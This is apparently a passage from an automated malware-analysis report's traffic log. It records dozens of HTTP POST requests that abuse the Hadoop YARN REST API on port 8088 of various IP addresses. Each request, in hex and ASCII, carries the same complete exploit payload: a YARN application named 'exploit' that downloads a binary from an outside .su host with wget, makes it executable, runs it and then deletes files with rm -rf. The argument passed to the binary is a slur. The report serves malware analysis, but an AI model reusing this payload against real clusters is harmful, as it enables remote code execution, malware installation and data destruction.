6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 142.172.118.111:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 204.235.25.185:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 254.30.40.98:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 112.144.139.77:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 94.201.90.86:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 94.201.90.86:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 94.201.90.86:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 94.201.90.86:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 94.201.90.86:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 31.240.32.116:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 31.240.32.116:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 31.240.32.116:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 204.235.25.185:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 31.240.32.116:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 31.240.32.116:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 254.30.40.98:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 31.240.32.116:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 31.240.32.116:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 22.172.178.76:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 22.172.178.76:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 